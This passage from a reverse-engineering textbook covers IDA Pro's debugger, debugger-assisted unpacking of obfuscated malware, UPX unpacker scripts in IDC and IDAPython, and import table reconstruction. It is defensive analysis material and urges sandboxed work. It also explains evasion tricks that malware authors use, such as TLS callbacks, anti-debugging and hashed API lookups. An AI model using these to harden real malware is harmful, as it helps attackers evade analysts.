         stats.altset(ea, stats.altval(ea) + 1);    // (3)
         return 0;
      }
      case dbg_step_until_ret:                      // (4)
         //print results
         for (nodeidx_t i = stats.alt1st(); i != BADNODE; i = stats.altnxt(i)) {   // (5)
            msg("%x: %d\n", i, stats.altval(i));
         }
         //delete the netnode and stop tracing
         stats.kill();                              // (6)
         request_disable_step_trace();              // (7)
         run_requests();                            // (8)
         break;
   }
   return 0;
}

The dbg_trace notification (1) will be received for each instruction that executes until we turn tracing off. When a trace notification is received, the address of the trace point is retrieved from the args list (2) and then used to update the appropriate netnode array index (3). The dbg_step_until_ret notification (4) is sent once the process hits the return statement to leave the function in which we started. This notification is our signal that we should stop tracing and print any statistics we have gathered. A loop is used (5) to iterate through all valid index values of the stats netnode before destroying the netnode (6) and requesting that step tracing be disabled (7). Since this example uses asynchronous commands, the request to disable tracing is added to the queue, which means we have to issue run_requests (8) in order for the queue to be processed. An important warning about synchronous versus asynchronous interaction with the debugger is that you should never call the synchronous version of a function while actively processing an asynchronous notification message.

Synchronous interaction with the debugger using the SDK is done in

a manner very similar to scripting the debugger. As with many of the SDK

functions we have seen in previous chapters, the names of debugger-related


functions typically do not match the names of related scripting functions, so

you may need to spend some time combing through dbg.hpp in order to find

the functions you are looking for. The biggest disparity in names between

scripting and the SDK is the SDK’s version of GetDebuggerEvent, which is called

wait_for_next_event in the SDK. The other major difference between script

functions and the SDK is that variables corresponding to the CPU registers

are not automatically declared for you within the SDK. In order to access the

values of CPU registers from the SDK, you must use the get_reg_val and

set_reg_val functions to read and write registers, respectively.

Summary

IDA may not have the largest share of the debugger market, but its debugger

is powerful and integrates seamlessly with the disassembly side of IDA. While

the debugger’s user interface, like that of any debugger, requires some initial

getting used to, it offers all of the fundamental features that users require in a

basic debugger. Strong points include scripting and plug-in capabilities along

with the familiar user interface of IDA’s disassembly displays and the power of

its analysis capabilities. Together the unified disassembler/debugger combi-

nation provides a solid tool for performing static analysis, dynamic analysis,

or a combination of both.


DISASSEMBLER/DEBUGGER INTEGRATION

An integrated disassembler/debugger combination such as IDA should be a pretty powerful tool for manipulating binaries and seamlessly applying static and dynamic techniques as part of the reverse engineering process. This turns out to be true if you understand the capabilities and limitations of each tool individually and in combination.

In this chapter we will discuss some important points concerning the

manner in which the static side of IDA interacts with its dynamic side, and

we will take a look at techniques that can be employed with IDA’s debugger

in order to defeat certain anti-debugging (and anti-disassembly) techniques

in the context of malware analysis. In that regard, it is important to remem-

ber that the goal in malware analysis is usually not to run the malware but to

obtain a disassembly of sufficient quality to allow static analysis tools to take

over. Recall from Chapter 21 that there are many techniques designed specif-

ically to prevent disassemblers from performing properly. In the face of such

540 Chapter 25

anti-disassembly techniques, the debugger is simply one means to an end. By

running an obfuscated program under debugger control, we will attempt to

obtain a de-obfuscated version of the program, which we then prefer to ana-

lyze using the disassembler.

Background

Some background on debugger-assisted de-obfuscation may be useful before

proceeding. It is well known that an obfuscated program must de-obfuscate

itself before it can get down to its intended business. The following steps pro-

vide a basic and somewhat simplistic guide for dynamic de-obfuscation of

binaries.

1. Open an obfuscated program with a debugger.

2. Search for and set a breakpoint on the end of the de-obfuscation routine.

3. Launch the program from the debugger and wait for your breakpoint to

trigger.

4. Utilize the debugger’s memory-dumping features to capture the current

state of the process to a file.

5. Terminate the process before it can do anything malicious.

6. Perform static analysis on the captured process image.

Most modern debuggers contain enough features to perform the tasks

just mentioned. OllyDbg[1] is a very popular Windows-only debugger often

used for such work. Step 2 is not always as straightforward as it may sound.

It may take a combination of tools, including spending some amount of time

in a disassembler such as IDA, or a lot of single stepping before the end of

the de-obfuscation algorithm can be properly identified. In many cases, the

end of de-obfuscation is marked by a behavior rather than a specific instruc-

tion. One such behavior might be a large change in the instruction pointer

value, indicating a jump to a location far from the de-obfuscation code. In

the case of UPX-packed binaries, for example, all you need to do is observe

that the instruction pointer holds a value that is less than the program’s entry

point address to know that de-obfuscation is complete and the program has

jumped to the newly de-obfuscated code. In generic terms, this process is

called original entry point (OEP) recognition, the OEP being the address at which

the program would have begun execution had it not been obfuscated.
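The two behavioral cues just described, a large change in the instruction pointer and a destination below the packed program's entry point, can be combined into a simple check over a recorded sequence of instruction pointer values. The Python sketch below is a heuristic illustration only: the function name, the far_jump threshold of 0x1000, and all addresses are assumptions, and the below-the-entry-point test reflects the UPX layout described above rather than a general rule.

```python
def find_oep_candidate(ip_trace, entry_point, far_jump=0x1000):
    """Return (index, ip) for the first control transfer that lands below
    the entry point after a large change in the instruction pointer,
    or None if no such transfer appears in the trace."""
    for i in range(1, len(ip_trace)):
        prev_ip, ip = ip_trace[i - 1], ip_trace[i]
        if ip < entry_point and abs(ip - prev_ip) >= far_jump:
            return i, ip
    return None


# Hypothetical trace: the unpacking stub runs near 0x40A000, then jumps away.
entry_point = 0x40A000
ip_trace = [0x40A000, 0x40A001, 0x40A010, 0x40A1F0, 0x401000, 0x401005]

candidate = find_oep_candidate(ip_trace, entry_point)
if candidate is not None:
    print("possible OEP at %x (trace index %d)" % (candidate[1], candidate[0]))
```

A check of this kind only nominates a candidate; confirming that the destination really is the original entry point still requires inspecting the code found there.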

Complicating matters, some modern obfuscators are capable of trans-

forming an input executable into an equivalent byte code program, which

is then executed on a custom virtual machine generated by the obfuscator.[2]

Executables protected with such virtualizing obfuscators cannot be analyzed

with the traditional expectation of recovering the original binary or locating

1. See http://www.ollydbg.de/.

2. For a discussion of one such obfuscator, VMProtect, see “Unpacking Virtualization Obfuscators” by Rolf Rolles at http://www.usenix.org/event/woot09/tech/full_papers/rolles.pdf.


the original entry point. This is a result of the fact that the original x86 (or

other processor) instructions are not embedded in the obfuscated binary

and are therefore unavailable for recovery.

If you are not careful, step 3 can be a dangerous one. In any case,

you should always think twice before you allow a piece of malware to run

unhindered in the hope that you have set your breakpoints or breakpoint

conditions properly. If the program manages to bypass your breakpoint(s),

it may well proceed to execute malicious code before you know what has

happened. For this reason, attempts to de-obfuscate malware under debug-

ger control should always be conducted in a sandbox environment that you

are not afraid to wipe clean in the event things go wrong.

Step 4 may require some level of effort, because memory dumping is usu-

ally supported in debuggers, while entire-process image dumping may not

be. The OllyDump[3] plug-in, by Gigapede, adds process-dumping capabilities

to OllyDbg. Keep in mind that the image that gets dumped from memory

contains content from a running process and does not necessarily reflect the

original state of the binary at rest in a disk file. In malware analysis, however,

the goal is generally to create not a working de-obfuscated executable file,

but rather an image file that is correctly structured so that it can be loaded

into a disassembler for further analysis.

One of the trickiest parts of reconstructing a binary image from an

obfuscated process is restoration of the program’s imported function table.

As part of the obfuscation process, a program’s import table is often obfus-

cated as well. As a result, the de-obfuscation process must also take care of

linking the newly de-obfuscated process to all of the shared libraries and

functions the process requires in order to execute properly. The only trace

of this process is usually a table of imported function addresses somewhere

within the process’s memory image. When dumping a de-obfuscated process

image to a file, steps are often taken to attempt to reconstruct a valid import

table in the dumped process image. In order to do this, the headers of the

dumped image need to be modified to point to a new import table structure

that must properly reflect all of the shared library dependencies of the origi-

nal de-obfuscated program. A popular tool for automating this process is the

ImpREC[4] (Import REConstruction) utility by MackT. As with process dumping, keep in mind that extracting a standalone executable may not be your

primary goal in malware analysis, in which case reconstructing valid headers

and a working import table is less important than knowing which functions

have been resolved and where the addresses of those functions have been

stored.
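Knowing which functions have been resolved amounts to mapping each pointer in the recovered address table back to a name. The Python sketch below illustrates the idea under stated assumptions: the table is a run of 32-bit little-endian pointers, the exports dictionary stands in for name information gathered from the loaded libraries, and every address and the function name resolve_import_table are hypothetical.

```python
import struct


def resolve_import_table(table_bytes, exports):
    """Map each nonzero 32-bit little-endian pointer in table_bytes to a
    function name, using '<unknown>' when the address is not recognized.
    Returns a list of (table offset, address, name) tuples."""
    resolved = []
    for offset in range(0, len(table_bytes) - 3, 4):
        (addr,) = struct.unpack_from("<I", table_bytes, offset)
        if addr == 0:
            continue   # zero entries commonly terminate one library's group
        resolved.append((offset, addr, exports.get(addr, "<unknown>")))
    return resolved


# Hypothetical export addresses and a four-entry table dumped from memory.
exports = {
    0x77001000: "kernel32.LoadLibraryA",
    0x77002000: "kernel32.GetProcAddress",
}
table = struct.pack("<4I", 0x77001000, 0x77002000, 0, 0x76003000)

for offset, addr, name in resolve_import_table(table, exports):
    print("+%02x  %08x  %s" % (offset, addr, name))
```

For analysis purposes, the resulting offset-to-name pairs are what matter: they tell you which table slot a given indirect call goes through, even if no valid import directory is ever rebuilt.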

IDA Databases and the IDA Debugger

It is important that we begin with an understanding of how the debugger

treats your database when you initiate (and terminate) a debugging session.

A debugger needs a process image to work with. Debuggers obtain process

3. See http://www.woodmann.com/collaborative/tools/index.php/OllyDump.

4. See http://www.woodmann.com/collaborative/tools/index.php/ImpREC.


images either by attaching to existing processes or by creating new processes

from executable files. An IDA database does not contain a valid process image,

nor in most cases can a valid process image be reconstructed from a database

(if one could, then File▸Produce File▸Create EXE File might be simple to

implement). When you launch a debugger session from IDA, the disassem-

bler side informs the debugger side of the name of the original input file,

which the debugger uses to create and attach to a new process. Information

provided to the debugger includes disassembly formatting, symbol names,

data formatting, and any comments that you have entered into the database.

An important point to understand is that any patches (changes in byte con-

tent) you have applied to your database will not be reflected in the process

being debugged. In other words, it is not possible to patch changes into the

database and expect to observe the effect of those changes when you launch

the debugger.

The opposite holds true as well. When you have finished debugging a

process and you return to disassembly mode, by default the only changes that

will be reflected in the database are cosmetic in nature (such as renamed

variables or functions). Any memory changes, such as self-modified code, are

not pulled back into the database for you to analyze. If you wish to migrate

any content, such as newly de-obfuscated code, from the debugger back to

your disassembly database, IDA will allow you to do so via the Debugger▸Take Memory Snapshot command. The resulting confirmation dialog is

shown in Figure 25-1.

Figure 25-1: Memory snapshot confirmation dialog

The default option is to copy loader segments from the running process

to the database. Loader segments are those segments that were loaded into the

database by the IDA loader module used to create the current database. In

the case of an obfuscated program, one or more of these segments probably

contain data that has been obfuscated and are therefore nearly impossible to

analyze in the disassembler. These are precisely the segments that you will

want to copy back from the running process image in order to take advan-

tage of the de-obfuscation work performed by the process running under

debugger control.

Selecting All segments causes all segments created by the debugger to

be copied back to the database. These segments include the contents of all

shared libraries loaded in support of the process as well as additional process-

related segments, such as the stack and heap contents.

When the debugger is used to attach to an existing process with no asso-

ciated database, none of the debugger segments will be flagged as loader seg-

ments because the file was not loaded by one of IDA’s loaders. In such cases,


you may elect to capture all available segments into a new database. Alterna-

tively, you may elect to edit segment attributes and designate one or more

segments as loader segments. Segment attributes may be edited by first opening the Segments window (View ▸ Open Subviews ▸ Segments). Any segment marked as a loader segment will contain an L in the L column of the Program Segmentation window. Right-clicking a segment of interest and selecting Edit Segment opens the segment attributes dialog shown in Figure 25-2.

Figure 25-2: Segment editing dialog with the Loader segment checkbox

Selecting the Loader segment checkbox marks the segment as a loader

segment and allows it to be copied into the database along with all other

loader segments.

The segment attributes dialog is also useful when you have created a pro-

cess from an open database and wish to add additional loader segments before

taking a memory snapshot. For example, if an obfuscated process extracts

the original code into a block of memory allocated in the heap (or a memory-

mapped block), you will want to mark that memory block as a loader seg-

ment before you snapshot memory; otherwise, the de-obfuscated code will

not be copied back into your database.
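The selection rule described above can be modeled in a few lines. The following Python sketch is a toy model rather than IDA API code: the Segment class, the is_loader flag, and the segment names are all assumptions made for illustration. It shows which segments a snapshot would copy under each dialog choice, and why a heap block holding unpacked code has to be flagged before the snapshot is taken.

```python
from dataclasses import dataclass

@dataclass
class Segment:
    name: str
    is_loader: bool  # models the "Loader segment" checkbox

def segments_to_copy(segments, all_segments=False):
    """Names of the segments a snapshot would copy for the chosen option."""
    return [s.name for s in segments if all_segments or s.is_loader]

# Hypothetical debugger session for a packed binary.
session = [
    Segment("UPX0", True),
    Segment("UPX1", True),
    Segment("debug_heap", False),    # block where unpacked code was written
    Segment("kernel32.dll", False),
]

default_copy = segments_to_copy(session)      # loader segments only
session[2].is_loader = True                   # mark the heap block as a loader segment
after_marking = segments_to_copy(session)
everything = segments_to_copy(session, all_segments=True)
```

In this model the heap block is picked up by the default option only after it has been marked, which mirrors the behavior described for the segment attributes dialog.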

Debugging Obfuscated Code

We have mentioned a number of times that loading an obfuscated program

in a debugger, allowing it to run until the de-obfuscation is complete, and

then taking a memory snapshot of the program in its de-obfuscated state

seems like a good strategy for obtaining a de-obfuscated version of a pro-

gram. Controlled execution is probably a better way of thinking about this

process than debugging, because all we are really doing is observing the

code in operation and then taking a memory snapshot at the appropriate


moment. A debugger simply happens to be the tool that allows us to accom-

plish this task. At least that is what we are hoping for. In Chapter 21 we dis-

cussed several anti-disassembly and anti-debugging techniques that obfuscators

utilize in an attempt to prevent us from obtaining a clear picture of a pro-

gram. It is time to see how IDA’s debugger can help us bypass some of these

techniques.

For this chapter we will assume that the obfuscated programs we are

dealing with employ some form of encryption or compression on the inter-

esting portions of the binary. The level of difficulty in obtaining a clear pic-

ture of that code depends entirely on the sophistication of any anti-analysis

techniques used in the obfuscation process and the measures that can be

developed to circumvent these techniques. Before we get started, however,

here are a few rules to live by when working with malware in a debugging

environment:

1. Protect your network and host environments. Always work in a sandbox

environment.

2. On initial analysis, use single stepping when possible. It may be tedious,

but it is your best defense against a program escaping your control.

3. Always think twice before executing a debugger command that will allow

more than a single instruction to execute. If you have not planned prop-

erly, the program you are debugging may run into a malicious portion of

the code.

4. When possible, use hardware breakpoints. It is difficult to set software

breakpoints in obfuscated code, because de-obfuscation algorithms may

modify the breakpoint instructions that you have inserted or compute

checksums over regions of code.5

5. When examining a program for the first time, it is best to allow the debug-

ger to handle all exceptions generated by the program so that you can

make informed decisions about which exceptions to pass to the program

and which exceptions the debugger should continue to catch.

6. Be prepared to restart debugging often, because one wrong step can

lead you down a road to failure (for example, if you allow the process

to detect the debugger). Keep detailed notes regarding addresses that

are safe to run to so that you can rapidly recover when you restart the

process.

In general, you should always take a very cautious approach the first time

you start to work with a particular obfuscated program. In most cases your

primary goal should be to obtain a de-obfuscated version of the program.

Speeding up the de-obfuscation process by learning exactly how far you can

go before you need to set a breakpoint should be a secondary goal, and it is

probably best saved for a follow-on exercise once you have managed to suc-

cessfully de-obfuscate a program for the first time.

5. Keep in mind that the software breakpoint instruction inserted by the debugger will cause the

checksum computation to yield a result other than the expected result.


Launching the Process

Whether you have spent minutes or hours studying a malicious executable

with IDA, you will probably want to gain control of it at the earliest opportu-

nity the first time you launch it in the debugger. One of the easiest ways to

gain control over a process is to set a breakpoint at the process entry point,

the first instruction executed once the operating system has finished creating the process’s memory image. In most cases this will be the symbol labeled start; however, in some cases it won’t. The PE file format, for example, allows for the designation of TLS6 callback functions designed to perform initialization

and destruction tasks for data that is local to each thread, and these TLS call-

back functions are invoked before control is ever transferred to start.

Malware authors are well aware of TLS callback functions and have made

use of these functions to have code executed before a program’s main entry

point code gets a chance to run. The hope is that anyone analyzing the mal-

ware will fail to notice the presence of the TLS callback, with a resulting fail-

ure to understand the true behavior of the program being analyzed. IDA

properly parses PE file headers and recognizes the presence of any TLS call-

backs contained within a PE file, adding any such functions to the binary’s

list of entry points in the Exports window. Figure 25-3 shows the Exports win-

dow for an executable that contains a TLS callback.

Figure 25-3: Exports window showing a TLS callback function

The bottom line when it comes to TLS callbacks is to recognize their

presence and then set breakpoints at the beginning of each TLS callback

function to ensure that you gain control of the process before it is too late.

Many debuggers offer options to specify when (if at all) the debugger

should pause following initial process creation, and IDA is no exception.

Figure 25-4 shows a portion of IDA’s Debugger Setup dialog (Debugger ▸ Debugger Options).

Figure 25-4: Debugger pausing events

6. For more information on Thread Local Storage (TLS) callback functions, please refer to the

PE file format specification http://msdn.microsoft.com/en-us/windows/hardware/gg463119.aspx.


Each of the available options offers the opportunity to automatically pause

the process being debugged when specific events occur. Each of these events

is summarized in the following list:

Stop on debugging start: This option offers the earliest opportunity to pause the debugger following process creation. For example, on Windows 7, this will pause the process at the beginning of the RtlUserThreadStart function within ntdll.dll. This will pause execution before any program code, including TLS callback functions, is executed.

Stop on process entry point: Causes the debugger to pause execution once the program entry point is reached. This typically coincides with the symbol named start (or its equivalent) in your IDA database. Any TLS callback functions will already have executed before this event takes place.

Stop on thread start/exit: Pauses the debugger each time a new thread starts or an existing thread terminates. On a Windows system, when this event fires, the debugger will pause somewhere within kernel32.dll.

Stop on library load/unload: Pauses the debugger each time a new library is loaded or an existing library is unloaded. On a Windows system, when this event fires, the debugger will pause somewhere within kernel32.dll.

Stop on debugging message: Pauses execution each time the process outputs a message using the debug print facility. On Windows systems, this corresponds to a call to OutputDebugString, and execution is paused within kernel32.dll.

Understanding where the process is likely to be paused for each of these

debugger events is important in order to keep the process you are debugging

from executing further than you intend it to. Once you are certain that you

will gain control of the process in a predictable manner, you can move on to

getting some work done with the debugger.

Simple Decryption and Decompression Loops

When we say simple decryption and decompression loops, we mean loops that

employ no nested obfuscation techniques and for which you can identify,

with certainty, all possible exit points. When you encounter such loops, the

easiest way to get through them is to set a breakpoint at all possible exit points

and then allow the loop to execute. Consider single stepping through such

loops one or two times in order to get a feel for them; then set breakpoints

accordingly. When setting a breakpoint immediately following a loop, you

should make sure that the bytes at the address at which you are setting the

breakpoint will not be changed during the course of the loop; otherwise,

a software breakpoint may fail to trigger. When in doubt, use a hardware

breakpoint.
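The caution about software breakpoints can be demonstrated outside of IDA. The following Python sketch is a toy model, not debugger code: it assumes a hypothetical single-byte XOR decoder and arbitrary sample bytes. It shows that a breakpoint byte (0xCC, the x86 int 3 opcode) planted inside a region that the loop later rewrites is itself "decoded", so the breakpoint disappears and the decoded byte at that location is wrong.

```python
INT3 = 0xCC  # x86 software breakpoint opcode

def xor_decode(buf, key):
    """Toy in-place decoder standing in for a de-obfuscation loop."""
    for i in range(len(buf)):
        buf[i] ^= key

def plant_breakpoint(buf, offset):
    """Model a debugger inserting a software breakpoint; return the saved byte."""
    saved = buf[offset]
    buf[offset] = INT3
    return saved

key = 0x5A
plain = bytes([0x61, 0xE9, 0x00, 0x10])          # arbitrary sample bytes
encoded = bytearray(b ^ key for b in plain)

# Plant the breakpoint in the still-encoded region, then let the loop run.
patched = bytearray(encoded)
plant_breakpoint(patched, 0)
xor_decode(patched, key)

breakpoint_survived = patched[0] == INT3
decoded_correctly = bytes(patched) == plain
```

Both flags end up False in this model. A hardware breakpoint leaves the bytes untouched, which is why it is the safer choice whenever the target address lies inside memory that the loop modifies.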

If your goal is to develop a fully automated de-obfuscation process, you

will need to develop an algorithm for recognizing when the de-obfuscation


process has completed. When this condition is satisfied, your automated

solution can pause the process, at which point you can acquire a memory

snapshot. For simple de-obfuscation routines, recognizing the end of the

de-obfuscation stage may be as simple as noting a large change in the value

of the instruction pointer or the execution of a specific instruction. For

example, the beginning and end of the UPX decompression routine for an

obfuscated Windows executable are shown in the following listing:

  UPX1:00410370 start proc near
① UPX1:00410370 pusha
  UPX1:00410371 mov esi, offset off_40A000
  UPX1:00410376 lea edi, [esi-9000h]
  UPX1:0041037C push edi
  ...
  UPX1:004104EC pop eax
② UPX1:004104ED popa ; opcode 0x61
  UPX1:004104EE lea eax, [esp-80h]
  UPX1:004104F2
  UPX1:004104F2 loc_4104F2: ; CODE XREF: start+186↓j
  UPX1:004104F2 push 0
  UPX1:004104F4 cmp esp, eax
  UPX1:004104F6 jnz short loc_4104F2
  UPX1:004104F8 sub esp, 0FFFFFF80h
③ UPX1:004104FB jmp loc_40134C

Several characteristics of this routine can be used to automatically recognize its completion. First, the routine begins by pushing all registers onto the stack at the program entry point ①. The complementary operation of popping all registers occurs near the end of the routine ② after the program has been decompressed. Finally, control is transferred ③ to the newly unpacked program. Thus, one strategy for automating decompression would be to step trace the program until the current instruction is a popa. Because step tracing is slow, the IDC script shown in Listing 25-1 takes the slightly different approach of scanning for the popa instruction and then running the program to the address of the popa:

#include <idc.idc>
#define POPA 0x61   // opcode of the x86 popa instruction
static main() {
   auto addr, seg;
   addr = BeginEA(); //Obtain the entry point address
   seg = SegName(addr);
   while (addr != BADADDR && SegName(addr) == seg) {      // ②
      if (Byte(addr) == POPA) {                            // ③
         RunTo(addr);                                      // ④ launch and run to the popa
         GetDebuggerEvent(WFNE_SUSP, -1);                  // wait for the process to suspend
         Warning("Program is unpacked!");
         TakeMemorySnapshot(1);                            // ⑤ copy loader segments only
         return;
      }
      addr = FindCode(addr, SEARCH_NEXT | SEARCH_DOWN);    // ① advance to the next instruction
   }
   Warning("Failed to locate popa!");
}

Listing 25-1: Simple UPX unpacker script

The script in Listing 25-1 is designed to be launched within an IDA database, prior to launching the debugger, and assumes that you have previously selected a debugger using Debugger ▸ Select debugger. The script takes care of the details of launching the debugger and gaining control of the newly created process. This script relies on some very specific features of UPX and is therefore not a good candidate for use as a generic de-obfuscation script. It does, however, demonstrate some concepts that might be used in later efforts. The script depends on the fact that the decompression routine resides at the end of one of the program segments (typically named UPX1) and that UPX does not make use of any desynchronization techniques to prevent proper disassembly.

The script relies on these facts in order to scan forward, one instruction at a time ①, from the program entry point, as long as the next instruction lies within the same program segment ② and until the current instruction is a popa ③. Once the popa instruction is located, the debugger is invoked ④ to execute the process up to the address of the popa instruction, at which point the program has been decompressed. The last step is to take a memory snapshot ⑤ to pull the de-obfuscated program bytes back into our database for further analysis.

OBFUSCATING OBFUSCATORS

UPX is one of the more popular obfuscation utilities in use today (perhaps because it is free). Its popularity does not make it a particularly effective tool, however. One of the principal drawbacks to its effectiveness is the fact that UPX itself offers a command-line option to restore a UPX-packed binary to its original form. Consequently, a cottage industry has evolved for developing tools to prevent UPX from unpacking itself. Because UPX performs some integrity checks on a compressed binary before it will unpack that binary, simple changes that cause the integrity checks to fail without affecting the operation of the compressed binary render UPX’s own unpacking feature inoperative. One such technique involves changing the default UPX section names to anything other than UPX0, UPX1, and UPX2. For this reason, it is useful to avoid hard-coding these segment names into any scripts that you develop for unpacking UPX.

An even more general-purpose solution for automated unpacking is to exploit the fact that many de-obfuscation routines are appended to the end of a binary and perform a jump to the original entry point, which occurs much earlier in the binary, once de-obfuscation is complete. In some cases, the original entry point may lie in an entirely different program segment, while in other cases, the original entry point simply precedes any address used by the de-obfuscation code. The Python script in Listing 25-2 offers a more basic means of running a simple de-obfuscation algorithm until it jumps to the program’s original entry point:

from idc import *                             # IDAPython wrappers for the IDC functions used below
start = BeginEA()
RunTo(start)                                  # ①
GetDebuggerEvent(WFNE_SUSP, -1)
EnableTracing(TRACE_STEP, 1)                  # ②
code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)
while code > 0:
    if GetEventEa() < start: break            # ③
    code = GetDebuggerEvent(WFNE_ANY | WFNE_CONT, -1)
PauseProcess()                                # ④
GetDebuggerEvent(WFNE_SUSP, -1)
EnableTracing(TRACE_STEP, 0)                  # ⑤
MakeCode(GetEventEa())                        # ⑥
TakeMemorySnapshot(1)

Listing 25-2: Generic attempt to run until OEP is hit

Similar to the script in Listing 25-1, this script should be launched from the disassembler rather than the debugger and again assumes that a debugger has been selected. The script handles the details of launching the debugger and gaining the necessary control of the newly created process. This particular script makes two assumptions: that all code prior to the entry point is obfuscated and that nothing malicious takes place prior to transferring control to an address that precedes the entry point. The script begins by launching the debugger and pausing at the program entry point ①. Next, the script enables step tracing ② and loops to test the address of each generated event ③. Once the event address precedes the program entry point address, de-obfuscation is assumed to be complete, and the process is paused ④ and step tracing disabled ⑤. Finally, for good measure, the script ensures that the bytes at the current instruction pointer location are formatted as code ⑥.
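The termination test used by the script can be examined in isolation. The following Python sketch is a simplified model that runs without IDA: find_oep and sample_trace are hypothetical names, and the trace is a hand-written list of instruction addresses modeled on the UPX listing shown earlier (a stub that begins at 0x410370 and finally jumps to 0x40134C). It applies the same rule as the step-tracing loop, namely that the first address below the entry point is taken to be the original entry point.

```python
def find_oep(trace, entry_point):
    """Return the first traced address below entry_point, or None if none occurs."""
    for ea in trace:
        if ea < entry_point:
            return ea
    return None

# Hypothetical step trace: the stub executes at and above 0x410370,
# then transfers control to 0x40134C.
sample_trace = [0x410370, 0x410371, 0x4104ED, 0x4104FB, 0x40134C, 0x40134D]
oep = find_oep(sample_trace, 0x410370)
```

The rule is only as good as the assumption behind it. A stub that calls a helper located below the entry point before unpacking has finished would satisfy the test too early.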

When stepping your way through obfuscated code, it is not uncommon

to encounter the warning shown in Figure 25-5.

Figure 25-5: Debugger instruction pointer warning

This warning indicates that the instruction pointer is pointing into an

item that IDA believed was data or that the instruction pointer is pointing

into the middle of a previously disassembled instruction. This warning is

frequently encountered when single stepping through code that utilizes


disassembly desynchronization techniques. It is also often encountered when

a program jumps to a region that was once data and is now code, as happens

following the de-obfuscation of a program. Answering yes to the question

causes IDA to reformat the bytes in question as code, which should be the

proper thing to do since the instruction pointer indicates that this is the next

item to be fetched for execution.

Note that because of its use of step tracing, the script in Listing 25-2 will

be substantially slower than the script in Listing 25-1. However, for the price

of slower execution, we gain a couple of advantages. First, we are able to

specify a termination condition that is not tied to any one address. This is not

possible when using breakpoints alone. Second, this script is immune to any

attempts to desynchronize the disassembler because instruction boundaries

are determined purely based on runtime values of the instruction pointer

rather than static disassembly analysis. In its announcement introducing

scripted debugging features,7 Hex-Rays presents a far more robust script for

performing the tasks of a universal unpacker.

Import Table Reconstruction

Once a binary has been de-obfuscated, analysis of that binary can begin.

While we may never intend to execute the de-obfuscated program (in fact,

we cannot execute that program if a snapshot was pulled directly into an IDA

database), a program’s import table is almost always a valuable resource for

developing an understanding of the program’s behavior.

Under normal circumstances, IDA is able to parse a program’s import

table as part of the file-loading process upon initial database creation. Unfor-

tunately, in obfuscated programs, the only import table that IDA sees at load

time belongs to the de-obfuscation component of the program. This import

table typically contains a bare minimum of functions required to complete

the de-obfuscation process. The most sophisticated obfuscators may generate

empty import tables, in which case the de-obfuscation component must con-

tain all of the code necessary to load libraries and resolve necessary functions

on its own.

As for the binary that has been obfuscated, in most cases its import table

has been obfuscated as well and is reconstructed, in some form, as part of the

de-obfuscation process. The reconstruction process typically relies on newly

de-obfuscated data in order to perform its own library loading and function

address resolution. For Windows programs, this nearly always involves calls to

the LoadLibrary function combined with repeated calls to GetProcAddress to

resolve required function addresses.

More sophisticated import table reconstruction routines may utilize cus-

tom lookup functions in place of GetProcAddress in order to avoid triggering

any breakpoints set on GetProcAddress itself. Such routines may also substitute

the use of hash values in place of strings for identifying which function’s

address is being requested. In rare cases, import table reconstructors may go

so far as to bypass LoadLibrary as well, in which case the reconstruction rou-

tine must implement its own custom version of that function.
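From the analyst's side, a hash-based lookup can often be reversed by hashing every export name of the candidate libraries and comparing the results against the constants found in the binary. The following Python sketch illustrates the idea under stated assumptions: the rotate-and-add hash shown here is only one illustrative scheme, not the algorithm of any particular obfuscator, and the export list is a small hypothetical sample.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def name_hash(name):
    """Illustrative rotate-and-add hash over an ASCII export name."""
    h = 0
    for ch in name.encode("ascii"):
        h = (ror32(h, 13) + ch) & 0xFFFFFFFF
    return h

def resolve_by_hash(target, export_names):
    """Return the first export whose hash equals target, or None."""
    for name in export_names:
        if name_hash(name) == target:
            return name
    return None

# Hypothetical sample of export names taken from a loaded library.
exports = ["GetProcAddress", "LoadLibraryA", "VirtualAlloc"]
wanted = name_hash("GetProcAddress")   # stands in for a constant found in the binary
resolved = resolve_by_hash(wanted, exports)
```

In practice the hash function must first be recovered from the reconstruction routine itself; once it is known, the same table-driven comparison applies.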

7. See http://www.hex-rays.com/idapro/scriptable.htm.


The net result of the import table reconstruction process is usually a

table of function addresses, none of which have much meaning in a static

analysis context. If we take a memory snapshot of a process, the best we are

likely to come up with is something like the following partial listing:

UPX1:0040A000 dword_40A000 dd 7C812F1Dh ; DATA XREF: start+1↓o
UPX1:0040A004 dword_40A004 dd 7C91043Dh ; DATA XREF: sub_403BF3+68↑r
UPX1:0040A004 ; sub_405F0B+2B4↑r ...
UPX1:0040A008 dd 7C812ADEh
UPX1:0040A00C dword_40A00C dd 7C9105D4h ; DATA XREF: sub_40621F+5D↑r
UPX1:0040A00C ; sub_4070E8+F↑r ...
UPX1:0040A010 dd 7C80ABC1h
UPX1:0040A014 dword_40A014 dd 7C901005h ; DATA XREF: sub_401564+34↑r
UPX1:0040A014 ; sub_4015A0+27↑r ...

This block of data depicts a number of 4-byte values, all in close proximity to one another and referenced from various locations within the program.

The problem is that these values, such as 7C812F1Dh, represent addresses of

library functions as they were mapped in the process we were debugging.

Within the code section of the program itself, we would see function calls

similar to the following:

UPX0:00403C5B ① call ds:dword_40A004
UPX0:00403C61 test eax, eax
UPX0:00403C63 jnz short loc_403C7B
UPX0:00403C65 ③ call sub_40230F
UPX0:00403C6A mov esi, eax
UPX0:00403C6C ② call ds:dword_40A058

Note that two of the function calls, ① and ②, refer to the contents of the reconstructed import table, while a third function call ③ refers to a function

whose body is present in the database. In an ideal world, each entry in the

reconstructed import table would be named after the function whose address

it contains.

This problem is best addressed before taking a memory snapshot of the

de-obfuscated process. As shown in the next listing, if we view the same mem-

ory range from within the debugger, we get an entirely different picture. Since

the debugger has access to the memory regions in which each referenced

function lies, the debugger is able to display addresses (such as 7C812F1Dh) as

their corresponding symbolic names (in this case kernel32_GetCommandLineA).

UPX1:0040A000 off_40A000 dd offset kernel32_GetCommandLineA ; DATA XREF: UPX0:loc_40128F↑r
UPX1:0040A000 ; start+1↓o
UPX1:0040A004 off_40A004 dd offset ntdll_RtlFreeHeap ; DATA XREF: UPX0:004011E4↑r
UPX1:0040A004 ; UPX0:0040120A↑r ...
UPX1:0040A008 off_40A008 dd offset kernel32_GetVersionExA ; DATA XREF: UPX0:004011D4↑r
UPX1:0040A00C dd offset ntdll_RtlAllocateHeap ; DATA XREF: UPX0:004011B3↑r
UPX1:0040A00C ; sub_405E98+D↑r ...
UPX1:0040A010 off_40A010 dd offset kernel32_GetProcessHeap ; DATA XREF: UPX0:004011AA↑r
